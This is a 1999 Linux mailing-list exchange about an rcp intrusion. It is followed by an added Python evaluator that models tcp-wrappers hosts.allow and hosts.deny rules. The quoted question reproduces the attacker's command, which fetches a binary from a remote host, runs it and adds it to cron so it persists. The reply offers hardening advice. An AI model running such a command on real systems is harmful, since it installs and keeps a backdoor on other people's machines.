[OLUG] RCP

Vincent Raffensberger vraffensberger at csm.edu
Tue Dec 14 18:11:22 UTC 1999


Todd wrote:
> 
>         Can anyone tell me how to stop RCP access to my Linux box, and if there are
> any security tools available to monitor a RCP connection.  On December 11
> someone gained access and performed the following to my machine:
> rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
>         I currently am running logwatch and uwatch, but this connection did not
> show up in either.      Any suggestions would be welcomed.
> 
> -------------------------------------------------------------------------

There are a few things you can do about this.

First of all, edit the settings in /etc/log.d/logwatch.conf and make the
detail level at least "8".  This should show most events like this.  If
that doesn't work you can further customize the settings.

If you're not using rcp and don't plan to, you can delete or move the
binary.

You should also set up tcp wrappers to "deny all" and only allow
necessary services to specific addresses.

My /etc/hosts.deny is "ALL: ALL" and here's what my /etc/hosts.allow is:

in.ftpd: ALL
sshd: ALL except PARANOID
httpd: ALL
webmin: 3.2.1.0/255.255.255.0

Now you have to worry about what else they've done....
-- 
Vincent Raffensberger		College of Saint Mary
Network Administrator		1901 S. 72nd. St.
402-399-2433                    Omaha, NE 68124

-------------------------------------------------------------------------
Sent by OLUG Mailing list Manager, run by ezmlm.  http://olug.bstc.net/ 
To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net` 
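As an added example (not part of the original exchange), the following Python evaluator applies the hosts.deny / hosts.allow pair quoted in the reply the way tcpd does: a match in hosts.allow grants, otherwise a match in hosts.deny denies, otherwise access is granted. It also handles the leading-dot domain-suffix form the reply does not use; the daemon name in.rshd (the rsh daemon that serves rcp) and all client addresses and hostnames are constructed assumptions.

```python
import re, ipaddress

# Constructed copy of the hosts.deny / hosts.allow pair quoted in the reply above.
HOSTS_DENY = "ALL: ALL\n"
HOSTS_ALLOW = """in.ftpd: ALL
sshd: ALL except PARANOID
httpd: ALL
webmin: 3.2.1.0/255.255.255.0
"""

def parse_rules(text):
    # Rule syntax: "daemon_list : client_list [: shell_command]"; '#' starts a comment.
    rules = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split(":")
        if len(fields) < 2:
            continue  # blank, comment-only or malformed line
        rules.append(tuple(re.split(r"[\s,]+", f.strip()) for f in fields[:2]))
    return rules

def list_matches(tokens, match):
    # "list_1 EXCEPT list_2" matches when list_1 matches and list_2 does not
    # (tcpd keywords are case-insensitive, so the reply's "except" works).
    for i, tok in enumerate(tokens):
        if tok.upper() == "EXCEPT":
            return list_matches(tokens[:i], match) and not list_matches(tokens[i + 1:], match)
    return any(match(tok) for tok in tokens)

def client_matches(tok, addr, host, paranoid):
    # Client patterns: ALL, PARANOID (forward and reverse DNS disagree),
    # net/mask, leading-dot domain suffix, or an exact hostname / address.
    if tok.upper() == "ALL":
        return True
    if tok.upper() == "PARANOID":
        return paranoid
    if "/" in tok:
        return ipaddress.ip_address(addr) in ipaddress.ip_network(tok, strict=False)
    if tok.startswith("."):
        return host.lower().endswith(tok.lower())
    return tok.lower() in (host.lower(), addr)

def access_allowed(daemon, addr, host=None, paranoid=False,
                   allow=HOSTS_ALLOW, deny=HOSTS_DENY):
    # tcpd order: hosts.allow match grants, else hosts.deny match denies, else granted.
    host = host or addr
    def hit(rules):
        return any(list_matches(ds, lambda t: t.upper() in ("ALL", daemon.upper()))
                   and list_matches(cs, lambda t: client_matches(t, addr, host, paranoid))
                   for ds, cs in rules)
    return hit(parse_rules(allow)) or not hit(parse_rules(deny))
```

With the quoted files, an rcp connection (in.rshd) from anywhere is refused, while sshd is refused only to clients whose forward and reverse DNS disagree.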
